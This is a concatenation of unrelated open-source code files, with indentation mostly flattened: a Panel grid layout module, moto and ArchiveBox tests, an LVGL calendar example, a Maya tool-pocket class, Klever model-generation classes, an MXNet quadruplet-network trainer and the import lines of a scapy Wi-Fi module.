max_xidx = [x1 for (_, _, _, x1) in self.objects if x1 is not None]
return max(max_xidx) if max_xidx else 0
@property
def grid(self):
grid = np.zeros((self.nrows, self.ncols), dtype='uint8')
for (y0, x0, y1, x1) in self.objects:
x0 = 0 if x0 is None else x0
x1 = self.ncols if x1 is None else x1
y0 = 0 if y0 is None else y0
y1 = self.nrows if y1 is None else y1
grid[y0:y1, x0:x1] += 1
return grid
def clone(self, **params):
"""
Makes a copy of the GridSpec sharing the same parameters.
Arguments
---------
params: Keyword arguments override the parameters on the clone.
Returns
-------
Cloned GridSpec object
"""
p = dict(self.param.get_param_values(), **params)
return type(self)(**p)
def __iter__(self):
for obj in self.objects.values():
yield obj
def __delitem__(self, index, trigger=True):
if isinstance(index, tuple):
yidx, xidx = index
else:
yidx, xidx = index, slice(None)
subgrid = self._object_grid[yidx, xidx]
if isinstance(subgrid, np.ndarray):
deleted = OrderedDict([list(o)[0] for o in subgrid.flatten()])
else:
deleted = [list(subgrid)[0][0]]
if deleted:
for key in deleted:
del self.objects[key]
if trigger:
self.param.trigger('objects')
def __getitem__(self, index):
if isinstance(index, tuple):
yidx, xidx = index
else:
yidx, xidx = index, slice(None)
subgrid = self._object_grid[yidx, xidx]
if isinstance(subgrid, np.ndarray):
params = dict(self.get_param_values())
params['objects'] = OrderedDict([list(o)[0] for o in subgrid.flatten()])
gspec = GridSpec(**params)
xoff, yoff = gspec._xoffset, gspec._yoffset
adjusted = []
for (y0, x0, y1, x1), obj in gspec.objects.items():
if y0 is not None: y0 -= yoff
if y1 is not None: y1 -= yoff
if x0 is not None: x0 -= xoff
if x1 is not None: x1 -= xoff
if ((y0, x0, y1, x1), obj) not in adjusted:
adjusted.append(((y0, x0, y1, x1), obj))
gspec.objects = OrderedDict(adjusted)
width_scale = gspec.ncols/float(self.ncols)
height_scale = gspec.nrows/float(self.nrows)
if gspec.width:
gspec.width = int(gspec.width * width_scale)
if gspec.height:
gspec.height = int(gspec.height * height_scale)
if gspec.max_width:
gspec.max_width = int(gspec.max_width * width_scale)
if gspec.max_height:
gspec.max_height = int(gspec.max_height * height_scale)
return gspec
else:
return list(subgrid)[0][1]
def __setitem__(self, index, obj):
from .pane.base import Pane
if not isinstance(index, tuple):
raise IndexError('Must supply a 2D index for GridSpec assignment.')
yidx, xidx = index
if isinstance(xidx, slice):
x0, x1 = (xidx.start, xidx.stop)
else:
x0, x1 = (xidx, xidx+1)
if isinstance(yidx, slice):
y0, y1 = (yidx.start, yidx.stop)
else:
y0, y1 = (yidx, yidx+1)
l = 0 if x0 is None else x0
        r = self.ncols if x1 is None else x1
        t = 0 if y0 is None else y0
        b = self.nrows if y1 is None else y1
key = (y0, x0, y1, x1)
overlap = key in self.objects
clone = self.clone(mode='override')
if not overlap:
clone.objects[key] = Pane(obj)
grid = clone.grid
else:
grid = clone.grid
grid[t:b, l:r] += 1
overlap_grid = grid>1
if (overlap_grid).any():
overlapping = ''
objects = []
for (yidx, xidx) in zip(*np.where(overlap_grid)):
old_obj = self[yidx, xidx]
if old_obj not in objects:
objects.append(old_obj)
overlapping += ' (%d, %d): %s\n\n' % (yidx, xidx, old_obj)
overlap_text = ('Specified region overlaps with the following '
'existing object(s) in the grid:\n\n'+overlapping+
'The following shows a view of the grid '
'(empty: 0, occupied: 1, overlapping: 2):\n\n'+
str(grid.astype('uint8')))
if self.mode == 'error':
raise IndexError(overlap_text)
elif self.mode == 'warn':
self.param.warning(overlap_text)
self.__delitem__(index, False)
self.objects[key] = Pane(obj)
self.param.trigger('objects')
class Spacer(Reactive):
"""Empty object used to control formatting (using positive or negative space)"""
_bokeh_model = BkSpacer
def _get_model(self, doc, root=None, parent=None, comm=None):
properties = self._process_param_change(self._init_properties())
model = self._bokeh_model(**properties)
if root is None:
root = model
self._models[root.ref['id']] = (model, parent)
return model
class VSpacer(Spacer):
"""
Spacer which automatically fills all available vertical space.
"""
sizing_mode = param.Parameter(default='stretch_height', readonly=True)
class HSpacer(Spacer):
"""
Spacer which automatically fills all available horizontal space.
"""
sizing_mode = param.Parameter(default='stretch_width', readonly=True)
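# For illustration: wrapping an object as ``Row(HSpacer(), obj, HSpacer())``
# centers it horizontally, since the stretch-width spacers absorb the free space.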
|
the-stack_106_15793
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function, unicode_literals
# Standard library modules
import unittest
# Third-party modules
import boto3
from botocore.exceptions import ClientError
# Package modules
from moto import mock_cloudformation
AWS_REGION = 'us-west-1'
SG_STACK_NAME = 'simple-sg-stack'
SG_TEMPLATE = """
AWSTemplateFormatVersion: 2010-09-09
Description: Simple test CF template for moto_cloudformation
Resources:
SimpleSecurityGroup:
Type: AWS::EC2::SecurityGroup
Description: "A simple security group"
Properties:
GroupName: simple-security-group
GroupDescription: "A simple security group"
SecurityGroupEgress:
-
Description: "Egress to remote HTTPS servers"
CidrIp: 0.0.0.0/0
IpProtocol: tcp
FromPort: 443
ToPort: 443
Outputs:
SimpleSecurityGroupName:
Value: !GetAtt SimpleSecurityGroup.GroupId
Export:
Name: "SimpleSecurityGroup"
"""
EC2_STACK_NAME = 'simple-ec2-stack'
EC2_TEMPLATE = """
---
# The latest template format version is "2010-09-09" and as of 2018-04-09
# is currently the only valid value.
AWSTemplateFormatVersion: 2010-09-09
Description: Simple test CF template for moto_cloudformation
Resources:
SimpleInstance:
Type: AWS::EC2::Instance
Properties:
ImageId: ami-03cf127a
InstanceType: t2.micro
SecurityGroups: !Split [',', !ImportValue SimpleSecurityGroup]
"""
class TestSimpleInstance(unittest.TestCase):
def test_simple_instance(self):
"""Test that we can create a simple CloudFormation stack that imports values from an existing CloudFormation stack"""
with mock_cloudformation():
client = boto3.client('cloudformation', region_name=AWS_REGION)
client.create_stack(StackName=SG_STACK_NAME, TemplateBody=SG_TEMPLATE)
response = client.create_stack(StackName=EC2_STACK_NAME, TemplateBody=EC2_TEMPLATE)
self.assertIn('StackId', response)
response = client.describe_stacks(StackName=response['StackId'])
self.assertIn('Stacks', response)
stack_info = response['Stacks']
self.assertEqual(1, len(stack_info))
self.assertIn('StackName', stack_info[0])
self.assertEqual(EC2_STACK_NAME, stack_info[0]['StackName'])
def test_simple_instance_missing_export(self):
"""Test that we get an exception if a CloudFormation stack tries to imports a non-existent export value"""
with mock_cloudformation():
client = boto3.client('cloudformation', region_name=AWS_REGION)
with self.assertRaises(ClientError) as e:
client.create_stack(StackName=EC2_STACK_NAME, TemplateBody=EC2_TEMPLATE)
self.assertIn('Error', e.exception.response)
self.assertIn('Code', e.exception.response['Error'])
self.assertEqual('ExportNotFound', e.exception.response['Error']['Code'])
|
the-stack_106_15796
|
import sqlite3
from .fixtures import *
def test_update_status_invalid(tmp_path, process, disable_extractors_dict):
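    # Add a snapshot, remove it from the SQLite index, then verify that
    # ``archivebox update --status=invalid`` re-imports the orphaned archive
    # folder back into the index.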
subprocess.run(['archivebox', 'add', 'http://127.0.0.1:8080/static/example.com.html'], capture_output=True, env=disable_extractors_dict)
assert list((tmp_path / "archive").iterdir()) != []
a_process = subprocess.run(['archivebox', 'remove', 'http://127.0.0.1:8080/static/example.com.html', '--yes'], capture_output=True)
conn = sqlite3.connect(str(tmp_path / "index.sqlite3"))
c = conn.cursor()
link = c.execute("SELECT * FROM core_snapshot").fetchone()
conn.commit()
conn.close()
assert link is None
update_process = subprocess.run(['archivebox', 'update', '--status=invalid'], capture_output=True, env=disable_extractors_dict)
conn = sqlite3.connect(str(tmp_path / "index.sqlite3"))
c = conn.cursor()
url = c.execute("SELECT url FROM core_snapshot").fetchone()[0]
conn.commit()
conn.close()
assert url == 'http://127.0.0.1:8080/static/example.com.html'
|
the-stack_106_15797
|
def event_handler(obj, event):
if event == lv.EVENT.CLICKED:
date = obj.get_pressed_date()
if date is not None:
obj.set_today_date(date)
calendar = lv.calendar(lv.scr_act())
calendar.set_size(230, 230)
calendar.align(None, lv.ALIGN.CENTER, 0, 0)
calendar.set_event_cb(event_handler)
# Set the today
today = lv.calendar_date_t()
today.year = 2018
today.month = 10
today.day = 23
calendar.set_today_date(today)
calendar.set_showed_date(today)
highlighted_days = [
lv.calendar_date_t({'year':2018, 'month':10, 'day':6}),
lv.calendar_date_t({'year':2018, 'month':10, 'day':11}),
lv.calendar_date_t({'year':2018, 'month':11, 'day':22})
]
calendar.set_highlighted_dates(highlighted_days, len(highlighted_days))
|
the-stack_106_15799
|
# -*- coding: utf-8 -*-
"""
Copyright 2020 Giuliano Franca
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
====================================================================================================
How to use:
* Copy the parent folder to the MAYA_SCRIPT_PATH.
* To find MAYA_SCRIPT_PATH paste this command in a Python tab:
import os; os.environ["MAYA_SCRIPT_PATH"].split(";")
* In Maya, go to Windows > Settings/Preferences > Plug-in Manager.
* Browse for "gfTools > plug-ins > dev > python"
* Find gfTools_P.py and import it.
Requirements:
* Maya 2017 or above.
Todo:
* Add commands to generate/read settings for the application
* Binary file or json file?
Sources:
* https://docs.python.org/3/reference/datamodel.html#special-method-names
This code supports Pylint. Rc file in project.
"""
import sys
import os
from collections import OrderedDict
if sys.version_info.major >= 3:
import pickle
else:
import cPickle as pickle
from gfUtilitiesBelt.core import appInfo
from gfUtilitiesBelt.core import getMayaInfo
reload(appInfo)
reload(getMayaInfo)
kPocketFileExt = ".gfpocket"
class Pocket(object):
"""
Read, write and perform operations between Pockets.
Constructors:
Pocket(name) | name - str\n
Pocket(name, tools) | name - str; tools - list of strings\n
Sequence Support:
        A Pocket is treated like a sequence of n string tools. ["This", "is", "a", "tool"].
len() returns the number of tools present in this class instance.
Indexing is supported but element assignment not.
Number Support:
Pocket = Pocket + Pocket | Concatenate tools from one Pocket to another.\n
Pocket += Pocket | Concatenate tools from one Pocket to another.\n
Pocket = Pocket - Pocket | Remove tools from one Pocket to another.\n
Pocket -= Pocket | Remove tools from one Pocket to another.\n
Comparison Support:
Pocket == Pocket | Returns True if tool list from one Pocket is exactly equal to another Pocket.\n
        Pocket != Pocket | Returns True if the tool list from one Pocket is not exactly equal to another Pocket's.
"""
####################################
# INIT METHODS
def __init__(self, name, tools=None):
"""Constructor."""
self.mayaVersion = appInfo.kMayaVersion
self.filePath = None
self.name = name
self.tools = tools
if self.tools is None:
self.tools = []
def __repr__(self):
"""Repr."""
return "%s.core.pockets.Pocket(name='%s', tools=%s)" %(appInfo.kApplicationName, str(self.name), str(self.tools))
def __str__(self):
"""Str."""
return str(self.tools)
####################################
# CONTENT METHODS
def __len__(self):
"""How much tools is in this pocket."""
return len(self.tools)
def __contains__(self, tool):
"""If this pocket contains this tool."""
if isinstance(tool, str):
return tool in self.tools
else:
raise TypeError("Tool must be an string.")
def __getitem__(self, key):
"""Retrieve a pocket tool by index."""
if isinstance(key, int):
pocketLen = len(self) - 1
if key <= pocketLen:
return self.tools[key]
else:
raise IndexError("List index out of range.")
else:
raise TypeError("Key index must be an integer.")
def __delitem__(self, key):
"""Delete a pocket tool by index."""
if isinstance(key, int):
pocketLen = len(self) - 1
if key <= pocketLen:
del self.tools[key]
else:
raise IndexError("List index out of range.")
else:
raise TypeError("Key index must be an integer.")
def __add__(self, otherPocket):
"""Concatenate content from another pocket to this pocket."""
newTools = [tool for tool in self.tools]
        if isinstance(otherPocket, Pocket):
            newTools.extend(otherPocket.tools)
            newTools = list(dict.fromkeys(newTools))
            return Pocket(self.name, newTools)
else:
raise TypeError("Cannot add Pocket to another type object.")
def __iadd__(self, otherPocket):
"""Concatenate content from another pocket to this pocket."""
        if isinstance(otherPocket, Pocket):
return self + otherPocket
else:
raise TypeError("Cannot add Pocket to another type object.")
def __sub__(self, otherPocket):
"""Remove content from another pocket to this pocket."""
        if isinstance(otherPocket, Pocket):
newTools = [tool for tool in self.tools if tool not in otherPocket.tools]
return Pocket(self.name, newTools)
else:
raise TypeError("Cannot subtract Pocket to another type object.")
def __isub__(self, otherPocket):
"""Remove content from another pocket to this pocket."""
        if isinstance(otherPocket, Pocket):
return self - otherPocket
else:
raise TypeError("Cannot subtract Pocket to another type object.")
####################################
# COMPARISON METHODS
def __eq__(self, otherPocket):
"""If this pocket is equal to another pocket."""
        if isinstance(otherPocket, Pocket):
return self.tools == otherPocket.tools
else:
raise TypeError("Cannot compare Pocket to another type object.")
def __ne__(self, otherPocket):
"""If this pocket is not equal to another pocket."""
        if isinstance(otherPocket, Pocket):
return self.tools != otherPocket.tools
else:
raise TypeError("Cannot compare Pocket to another type object.")
def __lt__(self, otherPocket):
"""If this pocket size is small than another pocket."""
        if isinstance(otherPocket, Pocket):
return len(self) < len(otherPocket)
else:
raise TypeError("Cannot compare Pocket to another type object.")
def __le__(self, otherPocket):
"""If this pocket size is small or equal to another pocket."""
        if isinstance(otherPocket, Pocket):
return len(self) <= len(otherPocket)
else:
raise TypeError("Cannot compare Pocket to another type object.")
def __gt__(self, otherPocket):
"""If this pocket size is bigger than another pocket."""
        if isinstance(otherPocket, Pocket):
return len(self) > len(otherPocket)
else:
raise TypeError("Cannot compare Pocket to another type object.")
def __ge__(self, otherPocket):
"""If this pocket size is bigger or equal to another pocket."""
        if isinstance(otherPocket, Pocket):
return len(self) >= len(otherPocket)
else:
raise TypeError("Cannot compare Pocket to another type object.")
####################################
# CLASS METHODS
@classmethod
def fromFile(cls, filepath):
"""Create a Pocket instance from a Pocket file.
Args:
filepath (str): The path where the file is.
Returns:
Pocket: The Pocket instance with all information.
Raises:
RuntimeError: If the file is not recognized.
"""
status = cls.checkFile(filepath)
if not status:
raise RuntimeError("File %s was not recognized." % os.path.basename(filepath))
with open(filepath, "rb") as f:
content = pickle.load(f)
newPocket = cls(content["Name"], content["Tools"])
newPocket.mayaVersion = content["Maya Version"]
newPocket.filePath = filepath
return newPocket
####################################
# STATIC METHODS
@staticmethod
def checkFile(filepath):
"""Check if the file specified is a Pocket file.
Args:
filepath (str): The filepath of the Pocket file.
Returns:
            True or False: True if the file is valid, False if it is not.
"""
fileName = os.path.basename(filepath)
# 1- Check if the file have the right extension: .gfpocket.
if not fileName.upper().endswith(kPocketFileExt.upper()):
return False
try:
with open(filepath, "rb") as f:
content = pickle.load(f)
# 2- Check if application name is right inside the file.
if content["Application"] != appInfo.kApplicationName:
return False
# 3- Check if the file version is compatible with application version.
status = appInfo.checkVersion(content["Version"])
if not status:
return False
# 4- Check if the Maya version is greater or equal the current Maya version.
status = appInfo.checkMayaVersion(content["Maya Version"])
if not status:
sys.stdout.write("[%s] The pocket %s was created in a newest Maya version. You may notice some unexpected results." % (appInfo.kApplicationName, fileName))
# 5- Check if tools are valid Maya tools or valid custom tools.
# TODO: Review this. Return False here?
mayaData = getMayaInfo.readMayaInfoFile()
for tool in content["Tools"]:
if tool not in mayaData.keys():
sys.stdout.write("[%s] The tool %s was not recognized as a Maya valid tool. You may notice some unexpected results." % (appInfo.kApplicationName, tool))
except Exception:
return False
return True
####################################
# REGULAR METHODS
def writeFile(self, output):
"""Write a gfpocket file with all the informations about a Pocket.
Args:
output (str): The path to save the file.
Returns:
True: If succeeded.
"""
content = OrderedDict()
content["Application"] = appInfo.kApplicationName
content["Version"] = appInfo.kApplicationVersion
content["Maya Version"] = self.mayaVersion
content["Name"] = self.name
content["Tools"] = self.tools
with open(output, "wb") as f:
pickle.dump(content, f, pickle.HIGHEST_PROTOCOL)
return True
def readFile(self, filepath):
"""Read the gfpocket file with all the informations about a Pocket.
Args:
filepath (str): The path where the file is.
Returns:
Pocket: The Pocket instance with all information.
Raises:
RuntimeError: If the file is not recognized.
"""
status = self.checkFile(filepath)
if not status:
raise RuntimeError("File %s was not recognized." % filepath)
with open(filepath, "rb") as f:
content = pickle.load(f)
newPocket = Pocket(content["Name"], content["Tools"])
newPocket.mayaVersion = content["Maya Version"]
newPocket.filePath = filepath
return newPocket
def deletePocket(self):
pass
def addTool(self):
pass
def removeTool(self):
pass
def moveToolUp(self):
pass
def moveToolDown(self):
pass
|
the-stack_106_15801
|
#
# Copyright (c) 2019 ISP RAS (http://www.ispras.ru)
# Ivannikov Institute for System Programming of the Russian Academy of Sciences
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import re
import sortedcontainers
from klever.core.vtg.emg.common.c.types import Array, Structure, Pointer
from klever.core.vtg.emg.generators.linuxModule.interface import Interface, Container
from klever.core.vtg.emg.common.process import Process, Label, Access, Block, Dispatch, Receive, Action
def get_common_parameter(action, process, position):
interfaces = [access.interface for access in process.resolve_access(action.parameters[position])
if access.interface]
for peer in action.peers:
candidates = [access.interface for access
in peer['process'].resolve_access(peer['action'].parameters[position])
if access.interface]
interfaces = set(interfaces) & set(candidates)
if len(interfaces) == 0:
raise RuntimeError('Need at least one common interface to send a signal')
else:
# Todo how to choose between several ones?
return list(interfaces)[0]
class Call(Action):
def __init__(self, name):
super().__init__(name)
self.callback = None
self.parameters = []
self.retlabel = None
self.pre_call = []
self.post_call = []
class CallRetval(Action):
def __init__(self, name):
super().__init__(name)
self.parameters = []
self.callback = None
self.retlabel = None
class ExtendedAccess(Access):
def __init__(self, expression):
super(ExtendedAccess, self).__init__(expression)
self._interface = None
self._base_interface = None
@property
def interface(self):
return self._interface
@interface.setter
def interface(self, value):
if not isinstance(value, Interface):
raise ValueError(f'Cannot set non-interface value as an interface to the access {str(self)}')
self._interface = value
@property
def base_interface(self):
if self._base_interface:
return self._base_interface
elif self._interface:
return self._interface
else:
return None
@base_interface.setter
def base_interface(self, value):
if not isinstance(value, Interface):
raise ValueError(f'Cannot set non-interface as a base interface to the access {str(self)}')
if not self._interface:
raise ValueError(f'Set the interface attribute before setting the base interface of {str(self)}')
self._base_interface = value
def replace_with_label(self, statement, label):
reg = re.compile(self.expression)
if reg.search(statement):
expr = self.access_with_label(label)
return statement.replace(self.expression, expr)
else:
return statement
def access_with_label(self, label):
# Increase use counter
if self.label and self.label.declaration and not self.interface:
target = self.label.declaration
elif self.label and str(self.interface) in self.label.interfaces:
target = self.label.get_declaration(str(self.interface))
else:
target = self.interface.declaration
expression = "%{}%".format(label.name)
accesses = self.list_access[1:]
if len(accesses) > 0:
candidate = label.declaration
previous = None
while candidate:
tmp = candidate
if candidate == target:
candidate = None
if isinstance(previous, Pointer):
expression = "*({})".format(expression)
elif isinstance(candidate, Pointer):
candidate = candidate.points
elif isinstance(candidate, Array):
candidate = candidate.element
expression += '[{}]'.format(accesses.pop(0))
elif isinstance(candidate, Structure):
field = accesses.pop(0)
if field in candidate.fields:
candidate = candidate.fields[field]
if isinstance(previous, Pointer):
expression += '->{}'.format(field)
else:
expression += '.{}'.format(field)
else:
raise ValueError("Cannot build access from given variable '{}', something wrong with types".
format(self.expression))
else:
raise ValueError("Cannot build access from given variable '{}', something wrong with types".
format(self.expression))
previous = tmp
return expression
class ExtendedLabel(Label):
def __init__(self, name):
super(ExtendedLabel, self).__init__(name)
self.match_implemented = False
self.container = False
self.resource = False
self.callback = False
self.parameter = False
self.retval = False
self.pointer = False
self.parameters = []
self._signature_map = sortedcontainers.SortedDict()
@property
def interfaces(self):
return list(self._signature_map.keys())
@property
def declarations(self):
if self.declaration:
return [self.declaration]
else:
return list(self._signature_map.values())
def get_declaration(self, identifier):
if identifier in self._signature_map:
return self._signature_map[identifier]
else:
return None
def set_declaration(self, identifier, declaration):
self._signature_map[identifier] = declaration
def set_interface(self, interface):
if isinstance(interface, Container):
self.set_declaration(str(interface), interface.declaration.take_pointer)
else:
self.set_declaration(str(interface), interface.declaration)
def __eq__(self, label):
if len(self.interfaces) > 0 and len(label.interfaces) > 0:
if len(list(set(self.interfaces) & set(label.interfaces))) > 0:
return True
else:
return False
elif len(label.interfaces) > 0 or len(self.interfaces) > 0:
if (self.container and label.container) or (self.resource and label.resource) or \
(self.callback and label.callback):
return True
else:
return False
else:
return super(ExtendedLabel, self).__eq__(label)
class ExtendedProcess(Process):
label_re = re.compile(r'%(\w+)((?:\.\w*)*)%')
def __init__(self, name: str, category: str):
super(ExtendedProcess, self).__init__(name, category)
self.self_parallelism = True
self.allowed_implementations = sortedcontainers.SortedDict()
self.instance_number = 0
def __copy__(self):
return super().__copy__()
@property
def name(self):
return self._name
@name.setter
def name(self, new_name):
# Extended process allows setting new names if necessary
self._name = new_name
@property
def category(self):
return self._category
@category.setter
def category(self, category):
# Extended process allows setting categories if necessary
self._category = category
@property
def unmatched_labels(self):
unmatched = [self.labels[label] for label in self.labels.keys()
if not self.labels[label].interface and not self.labels[label].signature]
return unmatched
@property
def unused_labels(self):
used_labels = set()
def extract_labels(expr):
for m in self.label_re.finditer(expr):
used_labels.add(m.group(1))
for action in self.actions.filter(include={Action}):
if (isinstance(action, Call) or isinstance(action, CallRetval)) and action.callback:
extract_labels(action.callback)
if isinstance(action, Call):
for param in action.parameters:
extract_labels(param)
if isinstance(action, Receive) or isinstance(action, Dispatch):
for param in action.parameters:
extract_labels(param)
if isinstance(action, CallRetval) and action.retlabel:
extract_labels(action.retlabel)
if isinstance(action, Block):
for statement in action.statements:
extract_labels(statement)
if action.condition:
for statement in action.condition:
extract_labels(statement)
return sortedcontainers.SortedSet(self.labels.keys()).difference(used_labels)
@property
def calls(self):
return self.actions.filter(include={Call})
@property
def containers(self):
return [self.labels[name] for name in self.labels if self.labels[name].container]
@property
def callbacks(self):
return [self.labels[name] for name in self.labels if self.labels[name].callback]
@property
def resources(self):
return [self.labels[name] for name in self.labels if self.labels[name].resource]
def extract_label(self, string):
name, tail = self.extract_label_with_tail(string)
return name
def add_access(self, expression, obj):
self._accesses.setdefault(expression, [])
if obj not in self._accesses[expression]:
self._accesses[expression].append(obj)
def extract_label_with_tail(self, string):
if self.label_re.fullmatch(string):
name = self.label_re.fullmatch(string).group(1)
tail = self.label_re.fullmatch(string).group(2)
if name not in self.labels:
raise ValueError("Cannot extract label name from string '{}': no such label".format(string))
else:
return self.labels[name], tail
else:
            raise ValueError('Cannot extract label from access {} in process {}'.format(string, self._name))
def establish_peers(self, process):
peers = self.get_available_peers(process)
for signals in peers:
for index in range(len(self.actions[signals[0]].parameters)):
label1 = self.extract_label(self.actions[signals[0]].parameters[index])
label2 = process.extract_label(process.actions[signals[1]].parameters[index])
if len(label1.interfaces) > 0 and not label2.declaration and \
not (label2.parameter or label2.retval):
for intf in label1.interfaces:
if label1.get_declaration(intf) and (intf not in label2.interfaces or
not label2.get_declaration(intf)):
label2.set_declaration(intf, label1.get_declaration(intf))
if len(label2.interfaces) > 0 and not label1.declaration and \
not (label1.parameter or label1.retval):
for intf in label2.interfaces:
if label2.get_declaration(intf) and (intf not in label1.interfaces or
not label1.get_declaration(intf)):
label1.set_declaration(intf, label2.get_declaration(intf))
if label1.declaration and not label2.declaration and len(label2.interfaces) == 0:
label2.declaration = label1.declaration
if label2.declaration and not label1.declaration and len(label1.interfaces) == 0:
label1.declaration = label2.declaration
self.actions[signals[0]].peers.append(
{
'process': process,
'action': process.actions[signals[1]]
})
process.actions[signals[1]].peers.append(
{
'process': self,
'action': self.actions[signals[0]]
})
def get_available_peers(self, process):
ret = []
# Match dispatches
for dispatch, receive in ((d, r) for d in self.actions.filter(include={Dispatch})
for r in process.actions.filter(include={Receive})):
if process.instance_number not in {p['process'].instance_number for p in dispatch.peers}:
match = self.__compare_signals(process, dispatch, receive)
if match:
ret.append([dispatch.name, receive.name])
# Match receives
for receive, dispatch in ((r, d) for r in self.actions.filter(include={Receive})
for d in process.actions.filter(include={Dispatch})):
if process.instance_number not in {p['process'].instance_number for p in receive.peers}:
match = self.__compare_signals(process, receive, dispatch)
if match:
ret.append([receive.name, dispatch.name])
return ret
def accesses(self, accesses=None, exclude=None, no_labels=False):
if not exclude:
exclude = list()
if not accesses:
accss = sortedcontainers.SortedDict()
if not self._accesses or len(exclude) > 0 or no_labels:
# Collect all accesses across process subprocesses
for action in self.actions.filter(include={Action}, exclude=exclude):
if isinstance(action, Call) or isinstance(action, CallRetval) and action.callback:
accss[action.callback] = []
if isinstance(action, Call):
for index in range(len(action.parameters)):
accss[action.parameters[index]] = []
if isinstance(action, Receive) or isinstance(action, Dispatch):
for index in range(len(action.parameters)):
accss[action.parameters[index]] = []
if isinstance(action, CallRetval) and action.retlabel:
accss[action.retlabel] = []
if isinstance(action, Block):
for statement in action.statements:
for match in self.label_re.finditer(statement):
accss[match.group()] = []
if action.condition:
for statement in action.condition:
for match in self.label_re.finditer(statement):
accss[match.group()] = []
# Add labels with interfaces
if not no_labels:
for label in self.labels.values():
access = '%{}%'.format(label.name)
if access not in accss:
accss[access] = []
if not self._accesses and len(exclude) == 0 and not no_labels:
self._accesses = accss
else:
accss = self._accesses
return accss
else:
self._accesses = accesses
def resolve_access(self, access, interface=None):
if isinstance(access, Label):
string = '%{}%'.format(access.name)
elif isinstance(access, str):
string = access
else:
return None
if not interface:
return self._accesses[string]
else:
cnds = [acc for acc in self._accesses[string] if acc.interface and str(acc.interface) == interface]
if cnds:
return cnds[0]
else:
return None
def get_implementation(self, access):
if access.interface:
if str(access.interface) in self.allowed_implementations[access.expression] and \
self.allowed_implementations[access.expression][str(access.interface)] != '':
return self.allowed_implementations[access.expression][str(access.interface)]
else:
return False
else:
return None
def add_label(self, name, declaration, value=None):
lb = ExtendedLabel(name)
lb.declaration = declaration
if value:
lb.value = value
self.labels[str(lb)] = lb
acc = ExtendedAccess('%{}%'.format(name))
acc.label = lb
acc.list_access = [lb.name]
self._accesses[acc.expression] = [acc]
return lb
def add_condition(self, name, condition, statements, comment):
new = Block(name)
self.actions[name] = new
new.condition = condition
new.statements = statements
new.comment = comment
return new
def __compare_signals(self, process, first, second):
if first.name == second.name and len(first.parameters) == len(second.parameters):
match = True
for index in range(len(first.parameters)):
label = self.extract_label(first.parameters[index])
if not label:
raise ValueError("Provide label in action '{}' at position '{}' in process '{}'".
format(first.name, index, self._name))
pair = process.extract_label(second.parameters[index])
if not pair:
raise ValueError("Provide label in action '{}' at position '{}'".
format(second.name, index, process.name))
if label != pair:
match = False
break
return match
else:
return False
|
the-stack_106_15804
|
import mxnet as mx
import mxnet.ndarray as nd
from utils.math import Distances
from utils.converters import Converters
from tensorboardX import SummaryWriter
from dataProcessor.tiffReader import GEOMAP
from networkProcessor.trainer import Trainer
from network.resnext import resnext50_32x4d
from dataProcessor.imageProcessor import ImageProcessor
from dataProcessor.imageSampler import ImageSampler
from dataProcessor.batchSampler.quadrupletBatchSampler import QuadrupletBatchSampler
from dataProcessor.supervisedImageSampler import SupervisedImageSampler
from dataProcessor.miningTypes import MiningTypes
from network.quadrupletnet import QuadrupletNet
class QuadrupletTrainer(Trainer):
def __init__(self,
batch_size,
image_size,
min_pos_dist=64/8,
max_pos_dist=64,
min_neg_dist=64*5,
max_neg_dist=64*10,
mining=[MiningTypes.RANDOM_HARD_NEGATIVE],
lr=0.1,
ctx=[mx.gpu()],
net=resnext50_32x4d(ctx=mx.gpu()),
margin=1.0,
margin2=0.5,
validation_map='osm',
random_reset=0.0,
load=True,
singleClassTreshold=0.0,
supervised=False,
alt_loss=False,
name=None,
**kargs
):
if name is None:
quadrupletNet = QuadrupletNet(ctx=ctx, margin=margin, margin2=margin2, net=net, load=load, alt_loss=alt_loss)
else:
quadrupletNet = QuadrupletNet(ctx=ctx, margin=margin, margin2=margin2, net=net, load=load, alt_loss=alt_loss, name=name)
if supervised:
imageSampler = SupervisedImageSampler(image_size, validationmap=validation_map, singleClassTreshold=singleClassTreshold)
else:
imageSampler = ImageSampler(min_pos_dist, max_pos_dist, min_neg_dist, max_neg_dist, image_size, validationmap=validation_map, random_reset=random_reset, singleClassTreshold=singleClassTreshold)
#batchSampler = TripletBatchSampler(batch_size, imageSampler, tripletNet.predict, Distances.L2_Dist, mining, random_mining_iterations=10, ctx=ctx)
batchSampler = QuadrupletBatchSampler(batch_size=batch_size, imageSampler=imageSampler, net=quadrupletNet.predict, distance=Distances.L2_Dist, mining=mining, random_mining_iterations=3, ctx=ctx[0])
super().__init__(
imageSampler=imageSampler,
batchSampler=batchSampler,
net=quadrupletNet,
name='QuadrupletNet',
batch_size=batch_size,
ctx=ctx,
validation_map=validation_map,
**kargs
)
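# A minimal usage sketch (hypothetical arguments; assumes the GEOMAP data and a
# GPU are available, and that the Trainer base class exposes the training loop):
#
#   trainer = QuadrupletTrainer(batch_size=32, image_size=64)
#   trainer.train()  # method name assumed from the Trainer base class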
|
the-stack_106_15805
|
import hmac
import hashlib
from itertools import count
import struct
import time
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.backends import default_backend
from scapy.automaton import ATMT, Automaton
from scapy.base_classes import Net
from scapy.config import conf
from scapy.compat import raw, chb
from scapy.consts import WINDOWS
from scapy.error import log_runtime, Scapy_Exception
from scapy.layers.dot11 import RadioTap, Dot11, Dot11AssoReq, Dot11AssoResp, \
Dot11Auth, Dot11Beacon, Dot11Elt, Dot11EltRates, Dot11EltRSN, \
Dot11ProbeReq, Dot11ProbeResp, RSNCipherSuite, AKMSuite
from scapy.layers.eap import EAPOL
from scapy.layers.l2 import ARP, LLC, SNAP, Ether
from scapy.layers.dhcp import DHCP_am
from scapy.packet import Raw
from scapy.utils import hexdump, mac2str
